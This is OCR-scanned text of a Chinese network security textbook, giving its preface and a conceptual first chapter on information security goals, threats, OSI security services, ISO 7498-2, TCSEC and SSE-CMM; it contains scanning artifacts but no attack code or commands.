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随 着 计算 机 网 络 技术 的 飞速 发 展 , 互 联网 已 经 深入 到 社会 的 各 个 方面 , 它 对 人 们 的 工作 
方式 .生活 方式 甚至 思维 方式 都 产生 了 巨大 的 影响 ,因此 ,可 以 说 互联 网 已 经 成 为 现代 人 生 
活 中 不 可 缺少 的 一 部 分 。 

但 是 ,人 们 在 享受 互联 网 所 带 来 愉悦 的 同时 ,也 不 可 避免 地 受到 一 系列 网 络 及 信息 安全 
问题 的 困扰 : 网 络 上 充斥 虚假 信息 ,非法 信息 ,病毒 日 益 猩 狂 ,黑客 攻击 无 孔 不 和 等, 这些 都 
严重 危及 到 个 人 、 企 事业 单位 万 至 国家 的 信息 安全 。 研 究 如 何 采取 有 效 的 方法 来 保护 重要 
信息 变 得 越 来 越 有 必要 ,本 书 便 是 在 这 样 一 个 大 背景 下 编撰 而 成 的 。 

本 书 立 足 于 当前 网 络 安全 与 信息 保障 的 具体 实践 ,深刻 而 全 面 地 反映 了 现代 网 络 安全 
与 信息 保障 的 新 理论 .新 方法 .新 成 果 。 本 书 在 内 容 的 选择 上 注重 学 术 性 、 实 用 性 、 创 新 性 与 
可 获得 性 ,同时 也 综合 考虑 了 不 同学 校 和 不 同 单位 的 教学 实际 ,力求 内 容 典型 ,精炼 .新 颖 ， 
具有 代表 性 和 可 操作 性 。 创 造 性 地 将 网 络 安全 与 信息 保障 工具 融 进 了 传统 教学 中 ,充分 揭 
示 了 网 络 安全 与 信息 保障 的 新 进展 ; 系统 而 全 面 地 介绍 了 常用 的 网 络 安全 与 信息 保障 理 
ie; 集中 介绍 了 网 络 安全 与 信息 保障 实践 ,相关 实验 的 介绍 基本 涵盖 了 网 络 安全 与 信息 保 
障 有 关 的 内 容 ; 系统 而 全 面 地 阐述 了 网 络 攻防 的 途径 与 方法 ,重点 介绍 了 网 络 攻防 的 实例 ; 
系统 而 全 面 地 总 结 了 网 络 安全 与 信息 保障 的 国内 外 进展 。 其 中 ,网 络 攻防 是 国内 相近 专著 
和 教材 中 所 未 包含 的 全 新 内 容 。 

在 全 面 总 结 当前 国内 外 网 络 安全 与 信息 保障 和 利用 教材 .专著 ,教学 实践 经 验 的 基础 
上 ,提炼 出 基本 适合 于 网 络 安全 与 信息 保障 教学 .能力 教 育 与 培养 的 核心 内 容 , 在 教学 实践 
基础 上 增加 了 创新 性 的 新 内 容 ,相关 内容 丰 富 了 网 络 安全 与 信息 保障 理论 ,对 于 增强 学 生 的 
相关 能 力 ,提高 综合 素质 都 有 重要 的 意义 。 

因此 ,本 书 作为 一 本 以 信息 安全 为 核心 的 教材 ,从 实用 和 可 获得 性 理论 的 角度 出 发 专门 
介绍 网 络 攻 防 的 方法 和 技巧 ,这 是 国内 对 网 络 安全 与 信息 保障 课 教 学 实践 和 教材 使 用 上 的 
大 胆 创 新 ,对 于 全 面 提高 信息 管理 计算 机 科学 与 技术 专业 学 生 的 信息 素质 和 综合 利用 相关 
工具 进行 信息 安全 管理 的 能 力 ,增强 学 生 的 信息 安全 意识 和 管理 信息 能 力 都 有 重要 的 现实 
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第 1 章 网 络 安全 与 信息 保障 概述 


本 童 首先 讲述 网 络 安 全 与 信息 保障 的 定义 、 内 涵 、 目 标 等 内 容 , 通 过 这 些 概 述 性 内 容 ,使 
读者 对 网 络 安全 与 信息 保障 有 一 个 大 致 的 了 解 。 


1.1 5| 


20 世纪 40 年 代 , 随 着 计算 机 的 出 现 ,计算 机 安全 问题 也 随 之 产生 。 随 着 计算 机 在 社会 
各 个 领域 的 广泛 应 用 和 迅速 普及 ,使 人 类 社会 步 人 信息 化 时 代 , 以 计算 机 为 核心 的 安全 、 保 
密 问题 越 来 越 突出 。 

20 世纪 70 年 代 以 来 ,在 应 用 和 普及 的 基础 上 ,以 计算 机 网 络 为 主体 的 信息 处 理 系统 迅 
速 发 展 , 计 算 机 应 用 也 逐渐 向 网 络 化 发 展 。 网 络 化 的 信息 系统 是 集 通信 、 计 算 机 和 信息 处 理 
于 一 体 的 ,是 现代 社会 不 可 缺少 的 基础 。 计 算 机 应 用 发 展 到 网 络 阶段 后 ,信息 安全 技术 得 到 
迅速 发 展 , 原 有 的 计算 机 安全 问题 增加 了 许多 新 的 内 容 。 

同 以 前 的 计算 机 安全 保密 相 比 ,计算 机 网 络 安全 技术 的 问题 要 多 得 多 ,也 复杂 得 多 , 涉 
及 物理 环境 、 硬 件 、 软 件数 据 、 传 给、 体系 结构 等 各 个 方面 。 除 了 传统 的 安全 保密 理论 ,技术 
及 单机 的 安全 问题 以 外 ,计算 机 网 络 安全 技术 包括 了 计算 机 安全 、 通 信安 全 ,访问 控制 的 安 
全 ,以 及 安全 管理 和 法 律 制 裁 等 内 容 , 并 逐渐 形成 独立 的 学 科 体 系 。 

当今 社会 是 一 个 信息 化 社会 ,计算 机 通信 和 网络 在 政治 、 军 事 、 人 金融、 商业、 交通、 电信 、 文 
教 等 方面 的 作用 日 益 增 大 。 社 会 对 计算 机 网 络 的 依赖 也 日 益 增 强 , 尤 其 是 计算 机 技术 和 通 
信 技 术 相 结合 所 形成 的 信息 基础 设施 已 经 成 为 反映 信息 化 社会 特征 最 重要 的 基础 设施 。 人 
们 建立 了 各 种 各 样 完备 的 信息 系统 ,使 得 人 类 社会 的 一 些 机 密 和 财富 高 度 集 于 计算 机 中 。 
但 是 这 些 信息 系统 都 是 依靠 计算 机 网 络 接受 和 处 理 信息 ,实现 其 相互 间 的 联系 和 对 目标 的 
管理 ,控制 。 以 网 络 方式 获得 信息 和 交流 信息 已 成 为 现代 信息 化 社会 的 一 个 重要 特征 。 随 
着 网 络 的 开放 性 、 共 享 性 及 互联 程度 的 扩大 ,特别 是 Internet 的 出 现 ,网 络 的 重要 性 和 对 社 
会 的 影响 也 越 来 越 大 。 随 着 网 络 上 各 种 新 业务 的 兴起 , 例如 电子 商务 (Electronic 
Commerce), F M & (Electronic Cash) 数字 货币 (Digital Cash), IJ £& 4R fT (Network 
Bank) 等 的 兴起 ,以 及 各 种 专用 网 (如 金融 网 等 ) 的 建设 ,使 得 安全 问题 显得 越 来 越 重要 , 因 
此 对 网 络 安全 的 研究 成 了 现在 计算 机 和 通信 界 的 一 个 热点 。 

简单 地 说 ,在 网 络 环境 中 的 安全 是 指 一 种 能 够 识别 和 消除 不 安全 因素 的 能 力 。 安 全 的 
一 般 性 定义 也 必须 解决 保护 财产 的 需要 ,包括 信息 和 物理 设备 (如 计算 机 本 身 )。 安 全 的 想 
法 也 涉及 适宜 性 和 从 属性 概念 。 负 责 安 全 的 任何 一 个 人 都 必须 决定 谁 在 具体 的 设备 上 进行 
合适 地 操作 ,以 及 什么 时 候 。 当 涉及 公司 安全 的 时 候 什 么 是 适宜 的 ,在 公司 与 公司 之 间 是 不 
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同 的 ,但 是 任何 一 个 具有 网 络 的 公司 都 必需 具有 一 个 解决 适宜 性 .从 属性 和 物理 安全 问题 的 
安全 政策 。 

伴随 着 现代 的 、 先 进 的 复杂 技术 ,例如 局 域 网 和 广域网 、Internet, 安 全 的 想法 和 实际 操 
作 已 变 得 更 加 复杂 。 

计算 机 网 络 安全 之 所 以 重要 ,其 主要 原因 在 于 以 下 几 个 方面 。 

CD 计算 机 存储 和 处 理 的 是 有 关 国 家 安全 的 政治 经济、 军事 、 国 防 的 情况 及 一 些 部 门 、 
机 构 、 组 织 的 机 密 信息 或 个 人 的 敏感 信息 、 隐 私 , 因 此 成 为 敌对 势力 .不 法 分 子 的 攻击 目标 。 

D 随 着 计算 机 系统 功能 的 日 益 完善 和 速度 的 不 断 提高 ,系统 组 成 越 来 越 复杂 、 系 统 规 
模 越 来 越 大 ,特别 是 Internet 的 迅速 发 展 , 存 取 控制 .逻辑 联结 数量 不 断 增 加 ,软件 规模 空前 
膨胀 ,任何 隐 含 的 缺陷 .失误 都 能 造成 巨大 损失 。 

(3) 人 们 对 计算 机 系统 的 需求 在 不 断 扩大 ,这 类 需求 在 许多 方面 都 是 不 可 逆转 、 不 可 替 
代 的 。 

(4) 随 着 计算 机 系统 的 广泛 应 用 ,各 类 应 用 人 员 队 伍 迅 速 发 展 壮大 ,教育 和 培训 却 往往 
跟 不 上 知识 更 新 的 需要 ,操作 人 员 ,编程 人 员 和 系统 分 析 人 员 的 失误 和 缺乏 经 验 都 会 造成 系 
统 的 安全 功能 不 足 。 

(5) 计算 机 网 络 安全 问题 涉及 许多 学 科 领 域 , 既 包 括 自然 科学 ,又 包括 社会 科学 。 就 计 
算 机 系统 的 应 用 而 言 ,安全 技术 涉及 计算 机 技术 .通信 技术 、 存 取 控 制 技术 .检验 认证 技术 、 
容错 技术 .加密 技术 , 防 病 毒 技术 . 抗 干 扰 技 术 、 防 泄漏 技术 等 ,因此 是 一 个 非常 复杂 的 综合 
问题 ,并 且 其 技术 方法 和 措施 都 要 随 着 系统 应 用 环境 的 变化 而 不 断 变化 。 

(6) 从 认识 论 的 高 度 看 ,人 们 往往 首先 关注 对 系统 的 需要 ,然后 才 被 动 地 从 现象 注意 系 
统 应 用 的 安全 问题 。 因 此 广泛 存在 着 重 应 用 轻 安 全 ,法律 意识 淡薄 .计算 机 素质 不 高 的 普遍 
现象 。 计 算 机 系统 的 安全 是 相对 不 安全 而 言 的 ,许多 和 危险、 隐患 和 攻击 都 是 隐藏 的 、 潜 在 的 、 
难以 明确 却 又 广泛 存在 的 。 

学 习 计算 机 网 络 安全 技术 的 目的 不 是 要 把 计算 机 系统 武装 到 百 分 百 安全 ,而 是 使 之 达 
到 相当 高 的 水 平 , 使 人 侵 者 的 非法 行为 变 得 极为 困难 危险 .耗资 巨大 ,获得 的 价值 远 不 及 付 
出 的 代价 高 。 


1.1.1 信息 安全 概述 


信息 是 一 种 资产 ,就 像 其 他 重要 的 商业 资产 一 样 , 它 对 一 个 组 织 来 说 是 有 价值 的 ,因此 
需要 妥善 进行 保护 。 信 息 安 全 保护 信息 免 受 多 种 威胁 的 攻击 ,保证 业务 连续 性 ,将 业务 损失 
降 至 最 少 ,同时 最 大 限度 地 获得 投资 回报 和 利用 商业 机 遇 。 信 息 存在 的 形式 多 种 多 样 。 它 
可 以 打印 或 写 在 纸 上 , 以 电子 文档 形式 存储 ,通过 邮寄 或 电子 手段 传播 ,以 胶片 形式 显示 或 
在 交谈 中 表达 出 来 。 不 管 信息 的 形式 如 何 , 或 通过 什么 手段 进行 共享 或 存储 ,都 应 加 以 妥善 
保护 。 

信息 安全 具有 以 下 特征 。 

CD 保密 性 : 确保 只 有 经 过 授权 的 人 才能 访问 信息 。 

@ 完整 性 : 保护 信息 和 信息 的 处 理 方法 准确 而 完整 。 

@ 可 用 性 : 确保 经 过 授权 的 用 户 在 需要 时 可 以 访问 信息 并 使 用 相关 信息 资产 。 

信息 安全 是 通过 实施 一 整套 适当 的 控制 措施 实现 的 。 控 制 措施 包括 策略 实践. 步骤 、 


组 织 结构 和 软件 功能 。 必 须 建立 起 一 整套 的 控制 措施 ,确保 满足 组 织 特定 的 安全 目标 。 
1.1.2 对 信息 的 安全 需求 的 理解 


信息 和 支持 进程 ,系统 以 及 网 络 都 是 重要 的 业务 资产 。 为 保证 组 织 富有 竞争 力 , 保 持 现 
金 流 顺畅 和 组 织 赢利 ,以 及 遵 纪 守法 和 维护 组 织 的 良好 商业 形象 ,信息 的 保密 性 、 完 整 性 和 
可 用 性 是 至 关 重 要 的 。 

各 个 组 织 及 其 信息 系统 和 网 络 所 面临 的 安全 威胁 与 日 俱 增 ,来 源 也 日 益 广泛 ,包括 利用 
计算 机 欺诈 窃取 机 密 、 恶 意 放 毁 破坏 等 行为 ,以 及 火灾 或 水 灾 。 和 危害 的 来 源 多 种 多 样 ,如 计 
算 机 病毒 .计算 机 黑客 行为 、 拒 绝 服务 攻击 等 ,这 些 行 为 呈 蔓 延 之 势 ` 用 意 更 加 险恶 ,而 且 手 
段 更 加 复杂 。 组 织 对 信息 系统 和 服务 的 依赖 意味 着 自身 更 容易 受到 安全 威胁 的 攻击 。 公 共 
网 络 与 专用 网 络 的 互联 以 及 对 信息 资源 的 共享 , 增 大 了 对 访问 进行 控制 的 难度 。 分 布 式 计 
算 尽 管 十 分 流行 ,但 降低 了 集中 式 专家 级 控制 措施 的 有 效 性 。 很 多 信息 系统 在 设计 时 ,没有 
考虑 到 安全 问题 。 通 过 技术 手段 获得 安全 保障 十 分 有 限 ,必须 辅 之 以 相应 的 管理 手段 和 操 
作 程 序 才能 得 到 真正 的 安全 保障 。 确 定 需要 使 用 什么 控制 措施 需要 周密 计划 ,并 对 细节 问 
题 加 以 注意 。 

作为 信息 安全 管理 的 最 基本 要 求 ,组织 内 所 有 的 雇员 都 应 参与 信息 安全 管理 。 信 息 安 
全 管理 还 需要 供应 商 、 客 户 或 股东 的 参与 。 也 需要 参考 来 自 组 织 之 外 的 专家 建议 。 

如 果 在 制定 安全 需求 规范 和 设计 阶段 时 就 考虑 到 了 信息 安全 的 控制 措施 ,那么 信息 安 
全 控制 的 成 本 会 很 低 , 并 更 有 效率 。 


1.1.3 网 络 安全 潜在 威胁 及 不 安全 因素 


1. 网 络 安全 潜在 威胁 

计算 机 网 络 所 面临 的 威胁 大 体 可 分 为 两 种 : 一 是 对 网 络 中 信息 的 威胁 ; 二 是 对 网 络 中 
设备 的 威胁 。 影 响 计算 机 网 络 的 因素 很 多 ,有 些 因素 可 能 是 有 意 的 ,也 可 能 是 无 意 的 ; 可 能 
是 人 为 的 ,也 可 能 是 非 人 为 的 ; 也 有 可 能 是 外 来 黑客 对 网 络 系统 资源 的 非法 使 用 。 

目前 ,归结 起 来 网 络 安全 所 面临 的 主要 潜在 威胁 有 以 下 几 方 面 。 

CD 信息 泄密 。 主 要 表现 为 网 络 上 的 信息 被 窃听 ,这 种 仅 窃 听 而 不 破坏 网 络 中 传输 信 
息 的 网 络 侵犯 者 称 为 消极 侵犯 者 。 

(2) 信息 被 算 改 。 这 就 是 纯粹 的 信息 破坏 ,这 样 的 网 络 侵犯 者 称 为 积极 侵犯 者 。 积 极 
侵犯 者 截取 网 上 的 信息 包 , 并 对 之 进行 更 改 使 之 失效 ,或 者 故意 添加 一 些 有 利于 自己 的 信息 
起 到 信息 误导 的 作用 。 积 极 侵犯 者 的 破坏 作用 最 大 。 

(3) 传输 非法 信息 流 。 用 户 可 能 允许 自己 同 其 他 用 户 进行 某 些 类 型 的 通信 , 但 禁止 其 
他 类 型 的 通信 ,如 允许 电子 邮件 传输 而 禁止 文件 传送 。 

(4) 网 络 资源 的 错误 使 用 。 如 果 不 合理 地 设 定 资源 访问 控制 ,一 些 资源 有 可 能 被 偶然 
或 故意 地 破坏 。 

(5) 非法 使 用 网 络 资源 。 非 法 用 户 登 录 进 入 系统 使 用 网 络 资源 ,造成 资源 的 消耗 ,损害 
合法 用 户 的 利益 。 

(6) 计算 机 病毒 已 经 成 为 威胁 网 络 安全 的 最 大 威胁 。 
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2. 不 安全 因素 

由 于 网 络 所 带 来 的 诸多 不 安全 因素 使 得 网 络 使 用 者 不 得 不 采取 相应 的 网 络 安全 对 策 。 
为 了 堵塞 安全 漏洞 和 提供 安全 的 通信 服务 ,必须 运用 一 定 的 技术 来 对 网 络 进行 安全 建设 E 
立 完善 的 法 律 .法 规 及 完善 管理 制度 ,提高 人 们 的 安全 意识 ,这 已 成 为 广大 网 络 开发 商 和 网 
络 用 户 的 共识 。 

依据 网 络 与 信息 所 面临 的 威胁 可 将 网 络 及 信息 的 不 安全 的 因素 归结 为 自然 灾害 和 人 为 
灾害 .系统 物理 的 故障 ` 人 为 的 无 意 失误 .网络 软 件 的 缺陷 .计算 机 病毒 .法规 与 管理 不 健全 。 

(1) 自然 灾害 : 包括 水 灾 、 火 灾 、 地 震 、 雷 击 、 台 风 及 其 他 自然 现象 造成 的 灾害 。 

(2) 人 为 灾害 : 包括 战争 、 纵 火 、. 盗 窃 设 备 及 其 他 影响 到 网 络 物理 设备 的 犯罪 等 。 

注意 : 自然 灾害 和 人 为 灾害 虽然 发 生 的 概率 很 小 ,但 也 不 容 忽 视 。 

(3) 系统 物理 故障 : 包括 硬件 故障 、 软 件 故 障 、 网 络 故障 和 设备 环境 故障 等 。 

电子 技术 的 发 展 使 电子 设备 出 现 故 障 的 概率 在 几 十 年 里 一 降 再 降 , 许 多 设备 在 它们 的 
使 用 期 内 根本 不 会 出 错 。 但 是 由 于 计算 机 和 网 络 的 电子 设备 往往 极 多 ,故障 还 是 时 有 发 生 。 
由 于 器 件 老化 ,电源 不 稳 、 设 备 环境 等 很 多 问题 使 计算 机 或 网 络 的 部 分 设备 暂时 或 永久 失 
效 。 这 些 故 障 一 般 都 具有 突 发 的 特点 o 

对 付 电子 设备 故障 的 方法 是 及 时 更 换 老化 的 设备 ,保证 设备 工作 的 环境 ,不 要 把 计算 机 
和 网 络 的 安全 与 稳定 联系 在 某 一 台 或 几 台 设备 上 上。 另外 还 可 以 采用 较为 智能 的 方案 ,例如 
现在 智能 网 络 的 发 展 ,能 使 网 络 上 出 现 故 障 的 设备 及 时 退出 网 络 , 其 他 设备 或 备份 设备 能 及 
时 弥补 空缺 ,使 用 户 感觉 不 到 网 络 出 现 了 问题 。 

软件 故障 一 般 要 寻求 软件 供应 商 来 解决 ,或 者 更 换 、 升 级 软件 。 

(4) 人 为 的 无 意 失 误 : 包括 程序 设计 错误 Ue Be E 无意 中 损坏 和 无 意 中 泄密 等 。 如 操 
作 员 安全 配置 不 当 造 成 的 安全 漏洞 .用户 安全 意识 不 强 、 用 户口 令 选 择 不 慎 、 用 户 将 自己 的 
账号 随意 转借 他 人 或 与 别人 共享 等 都 会 对 网 络 安 全 带 来 威胁 。 这 些 失 误 有 的 可 以 靠 加 强 管 
理 来 解决 ,有 的 则 无 法 预测 ,甚至 永远 无 法 避免 。 限 制 个 人 对 网 络 和 信息 的 权限 ,防止 权力 
的 滥用 ,采取 适当 的 监督 措施 有 助 于 部 分 解决 人 为 无 意 失误 的 问题 。 出 现 失误 之 后 可 以 及 
时 发 现 ,及 时 补救 也 能 大 大 减少 损失 。 


1.2 网 络 安全 与 信息 保障 技术 的 发 展 


为 了 维护 网 络 与 信息 系统 的 安全 ,单纯 赁 技术 力量 解决 是 不 够 的 ,还 必须 依靠 政府 和 立 
法 机 构 制 定 出 完善 的 法 律 法 规 进行 制约 ,给 非法 攻击 者 以 威慑 。 只 有 全 社会 行动 起 来 共同 
努力 ,才能 从 根本 上 治理 高 科技 领域 的 犯罪 行为 ,确保 网 络 与 信息 的 应 用 和 发 展 。 

在 网 络 安全 系统 的 法 规 和 管理 方面 ,我国 起 步 较 晚 , 目前 还 有 很 多 不 完善 ,不 健全 的 地 
方 , 这 给 了 某 些 不 法 分 子 可 乘 之 机 。 但 是 政府 和 立法 机 构 已 经 注意 到 了 这 个 问题 ,立法 工作 
正在 迅速 进行 ,而 且 打 击 力度 是 相当 大 的 。 各 个 公司 .部门 的 管理 者 也 逐步 关心 这 个 问题 。 
随 着 安全 意识 的 进一步 提高 ,由 于 法 规 和 管理 不 健全 导致 的 安全 威胁 将 逐渐 减少 。 


1.2.1 网 络 安全 体系 结构 
为 了 适应 网 络 技术 的 发 展 , 国 际 标准 化 组 织 (ISO) 的 计算 机 专业 委员 会 根据 开放 系统 


互联 参考 模型 制定 了 一 个 网 络 安全 体系 结构 模型 。 这 个 三 维 模型 从 比较 全 面 的 角度 来 考虑 
网 络 与 信息 的 安全 问题 。 

网 络 安全 需求 应 该 是 全 方位 的 、 整 体 的 。 在 OSI 7 个 层次 的 基础 上 ,将 安全 体系 划分 为 
4 个 级 别 : 网 络 级 安全 、 系 统 级 安全 、 应 用 级 安全 及 企业 级 安全 ,而 安全 服务 渗透 到 每 一 个 
层次 ,从 尽量 多 的 方面 考虑 问题 ,有 利于 减少 安全 漏洞 和 缺陷 。 


1.2.2 主要 的 安全 服务 


针对 网 络 系统 受到 的 威胁 ,OSI 安全 体系 结构 提出 了 以 下 几 类 安全 服务 。 

A) 身份 认证 (Authentication) : 这 种 服务 是 在 两 个 开放 系统 同等 层 中 的 实体 建立 连接 
和 数据 传送 期 间 ,为 提供 连接 实体 身份 的 鉴别 而 规定 的 一 种 服务 。 这 种 服务 防止 冒充 或 重 
传 以 前 的 连接 , 即 防止 伪造 连接 初始 化 这 种 类 型 的 攻击 。 这 种 鉴别 服务 可 以 是 单 向 的 也 可 
以 是 双向 的 。 

(2) 访问 控制 (Access ControD : 访问 控制 服务 可 以 防止 未 经 授权 的 用 户 非法 使 用 系 
统 资 源 。 这 种 服务 不 仅 可 以 提供 给 单个 用 户 , 也 可 以 提供 给 封闭 的 用 户 组 中 的 所 有 
用 户 。 

G) 数据 保密 (Data Confidentiality): 数据 保密 服务 的 目的 是 保护 网 络 中 各 系统 之 间 
交换 的 数据 ,防止 因数 据 被 截获 而 造成 的 泄密 。 

(4) 数据 完整 性 (Data Integrity): 这 种 服务 用 来 防止 非法 实体 对 用 户 的 主动 攻击 (对 
正在 交换 的 数据 进行 修改 .插入 、 使 数据 延 时 及 丢失 数据 等 ) ,以 保证 数据 接收 方 收 到 的 信息 
与 发 送 方 发 送 的 信息 完全 一 致 。 

(5) 不 可 否认 性 (Non-Repudiation) : 这 种 服务 有 两 种 形式 。 第 一 种 形式 是 源 发 证 明 ， 
即 某 一 层 向 上 一 层 提供 的 服务 , 它 用 来 确保 数据 是 由 合法 实体 发 出 的 , 它 为 上 一 层 提供 对 数 
据 源 的 对 等 实体 进行 鉴别 ,以 防 假冒 ; 第 二 种 形式 是 交付 证 明 , 用 来 防止 发 送 数据 方 发 送 数 
据 后 否认 自己 发 送 过 数据 ,或 接收 方 接收 数据 后 否认 白 己 收 到 过 数据 。 

(6) 审计 管理 (Auditing Management): 对 用 户 和 程序 使 用 资源 的 情况 进行 记录 和 审 
查 , 可 以 及 早 发 现 人 侵 活动 ,以 保证 系统 安全 ,并 帮助 查 清 事故 原因 。 

(7) 可 用 性 (Availability): 保证 信息 使 用 者 都 可 得 到 相应 授权 的 全 部 服务 。 


1.2.3 网 络 安全 服务 与 网 络 层次 关系 


从 网 络 的 7 个 层次 的 角度 来 考虑 安全 问题 ,比较 接近 网 络 和 应 用 系统 的 结构 层次 ,便于 
充分 全 面 地 考虑 具体 实际 的 软件 .硬件 的 安全 。 例 如 , 拿 到 一 个 通信 软件 ,可 以 从 协议 层次 
角度 分 析 该 软件 从 应 用 层 到 网 络 层 的 哪些 层次 上 加 了 安全 的 保护 ,各 层 的 安全 性 强度 如 何 ， 
哪 一 层 上 最 容易 受到 攻击 等 。 

由 于 OSI 参考 模型 是 一 种 层次 结构 , 某 种 安全 服务 由 某 些 层次 支持 更 有 效 ,而 另外 一 
些 层次 却 不 能 支持 。 因 此 ,存在 一 个 安全 服务 与 网 络 层次 的 配置 问题 ,在 这 些 层次 之 中 ,上 
一 层 的 安全 对 下 层 的 安全 也 有 一 定 的 依赖 性 ,但 与 系统 的 层次 不 一 样 ,各 层 的 安全 性 可 以 是 
独立 的 。 下 层 实 现 的 安全 对 上 层 可 以 是 透明 的 ,也 就 是 说 上 层 感觉 不 到 下 层 已 经 实现 了 安 
全 。 而 下 层 不 安全 时 ,上 层 也 可 以 独立 实现 安全 。 
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1.2.4 网 络 安 全 标准 


在 完成 关于 一 些 安全 基础 的 讨论 后 ,下 面 介绍 几 种 已 存在 的 安全 标准 。 

1. ISO 7498-2 

安全 体系 结构 文献 定义 了 安全 就 是 最 小 化 资产 和 资源 的 漏洞 。 资 源 可 以 指 任何 事物 
漏洞 是 指 任何 可 以 造成 破坏 系统 或 信息 的 弱点 ; 威胁 是 指 潜在 的 安全 破坏 。ISO 还 进一步 
为 威胁 进行 分 类 ,例如 ,在 前 面 介绍 的 不 安全 因素 。ISO 7498-2 安全 体系 结构 文献 中 还 定 
义 了 几 种 安全 服务 。 

ISO 7498-2 中 描述 的 安全 体系 结构 的 5 种 安全 服务 项 目 是 : 鉴别 .访问 控制 、 数 据 保 
密 数据 完整 性 和 抗 否认 。 

为 了 实现 5 种 安全 服务 ,制定 了 8 种 安全 机 制 是 : 加 密 机 制 ,数字 签名 机 制 . 访 问 控制 
机 制 、 数 据 完 整 性 机 制 ,鉴别 交换 机 制 . 通 信 业 务 填 充 机制 . 路 由 控制 机 制 和 公正 机 制 。 

2. B 

目前 广 为 流 行 的 美国 国防 部 开发 的 计算 机 安全 标准 一 一 可 信任 计算 机 标准 评价 准则 
(Trusted Computer Standards Evaluation Criteria, TCSEC) , 即 网 络 安全 橘 皮 书 用 来 评价 一 
个 计算 机 系统 的 安全 性 。TCSEC 将 计算 机 系统 的 可 信任 程度 , 即 安全 等 级 划分 为 4 类 7 
级 , 按 安全 程度 从 最 低 到 最 高 的 完全 排序 是 D,C1,C2,B1,B2,B3,A1, 


1.2.5 安全 策略 的 重要 性 


网 络 安全 的 一 个 最 重要 的 任务 就 是 制定 一 个 安全 策略 。 多 数 的 用 户 都 想 用 一 个 技术 方 
案 来 解决 每 个 问题 ,然而 一 个 深思 熟 虑 的 安全 规划 ,将 帮助 用 户 决定 哪些 需要 保护 ,由 谁 来 
负责 执行 保护 。 

安全 策略 的 目的 是 决定 一 个 组 织 机 构 怎 样 来 保护 自己 。 一 般 来 说 ,策略 包括 两 个 部 分 : 
总 体 的 策略 和 具体 的 规则 。 总 体 的 策略 用 于 阐明 公司 安全 政策 的 总 体 思 想 , 而 具体 的 规则 
用 于 说 明 什么 活动 是 被 允许 的 ,什么 活动 是 被 禁止 的 。 

1. 制定 组 织 机 构 的 整体 安全 策略 

整体 安全 策略 制定 组 织 机 构 的 战略 性 安全 指导 方针 ,并 为 实现 这 个 方针 分 配 必要 的 人 
力 物 力 。 一 般 是 管理 层 的 官员 ,如 组 织 机 构 的 领导 者 和 高 层 领 导 人 员 来 主持 制定 这 种 策略 
以 建立 该 组 织 机 构 的 计算 机 安全 计划 和 其 基本 框架 结构 。 

2. 制定 和 系统 相关 的 安全 策略 

一 般 根 据 整体 策略 提出 一 个 系统 的 具体 保护 措施 。 这 种 策略 着 重 于 某 一 具体 的 系统 ， 
更 为 详细 。 

安全 策略 的 制定 是 为 了 保证 信息 的 保密 性 、 完 整 性 和 可 用 性 ,因此 应 具有 普遍 的 指导 意 
义 。 应 该 针对 安全 系统 所 面临 的 各 种 威胁 ,提出 控制 策略 ,并 为 系统 的 配置 .管理 和 应 用 提 
供 基本 的 框架 。 有 了 安全 策略 ,系统 才 可 能 正常 有 序 地 运行 ,也 才 可 能 更 安全 ,合理 地 使 用 
信息 系统 资源 。 有 了 安全 策略 , 才 可 能 更 加 高 效 、 迅 速 地 解决 安全 问题 ,使 威胁 造成 的 损失 
降 为 最 小 。 制 定安 全 策略 的 依据 如 下 。 

CD. 须 对 资源 进行 评估 ,包括 硬件 .软件 ,数据 文档 等 分 出 安全 等 级 。 

(2) 对 可 能 的 威胁 进行 分 析 ,包括 非 授权 访问 、 信 息 泄漏 和 内 部 缺陷 等 。 


(3) 确定 用 户 的 权力 和 责任 ,包括 账户 管理 资源 访问 权限 、 口 令 应 用 及 建立 备份 等 。 

(4) 明确 系统 管理 员 的 权力 和 责任 ,包括 物理 安全 、 系 统 配置 .账户 设置 及 使 用 权限 , 口 
令 管理 .审计 和 监控 等 方面 。 

O 提出 一 般 性 的 安全 防护 措施 : 存 取 控制 认证、 密码 技术 、 防 火 墙 技术 ,操作 系统 安 
全 数据库 系 统 安全 、 计 算 机 病毒 防护 、 审 计 和 恢复 等 。 

(6) 在 安全 维护 方面 ,企业 应 注意 当 安 全 事件 发 生 时 应 如 何 处 理 , 因 此 应 有 完善 的 事故 
处 理 及 事后 处 理 的 策略 和 制度 。 


1.3 信息 安全 管理 的 模型 (SSE-CMM) 


1.3.1 背景 


系统 安全 工程 能 力 成 熟 模 型 (Systems Security Engineering Capability Maturity 
Model,SSE-CMM) ,描述 了 一 个 组 织 的 安全 工程 过 程 必须 包含 的 本 质 特征 ,这 些 特征 是 完 
善 的 安全 工程 保证 。 尽 管 SSE-CMM 没有 规定 一 个 特定 的 过 程 和 步骤 ,但 是 它 汇集 了 工业 
界 常 见 的 实施 方法 。 它 覆盖 了 以 下 内 容 : 

CD 整个 生命 期 : 包括 开发 运行、 维护 和 终止 。 

(2) 整个 组 织 : 包括 其 中 的 管理 组织 和 工程 活动 。 

G) 与 其 他 规范 并 行 的 相互 作用 : 如 系统 .软件 .硬件 .人 的 因素 测试 工程 .系统 管理 、 
运行 和 维护 等 规范 。 

(4) 与 其 他 机 构 的 相互 作用 : 包括 获取 .系统 管理 .认证 .认可 和 评价 机 构 。 

在 SSE-CMM 描述 中 ,提供 了 对 所 基于 的 原理 \ 体 系 结构 的 全 面 描述 ; 模型 的 高 层 综 
述 ; 适当 运用 此 模型 的 建议 ; 包括 在 模型 中 的 实施 以 及 模型 的 属性 描述 。 它 还 包括 了 开发 
该 模型 的 需求 。SSE-CMM 评定 方法 部 分 描述 了 针对 SSE-CMM 来 评价 一 个 组 织 的 安全 工 
程 能 力 的 过 程 和 工具 。 

无 论 是 顾客 ,还 是 供应 商都 对 改进 安全 产品 、 系 统 和 服务 的 开发 感 兴趣 。 安 全 工程 领域 
已 有 一 些 被 充分 接受 的 原则 ,但 目前 仍 缺 少 一 个 易于 理解 的 评估 安全 工程 实施 的 框架 。 
SSE-CMM 正 是 这 样 一 个 框架 , 它 为 安全 工程 原则 的 应 用 提供 了 一 个 衡量 和 改进 的 途径 。 

必须 强调 安全 工程 是 一 个 独特 的 科目 ,需要 独特 的 知识 .技能 和 过 程 来 创建 一 个 专用 于 
安全 工程 的 CMM。 这 与 安全 工程 将 在 系统 工程 方式 下 进行 并 不 冲突 。 事 实 上 ,有 明确 定 
义 和 易 于 接受 的 活动 可 以 使 安全 工程 能 够 在 各 种 情况 下 更 有 效 地 加 以 实施 。 

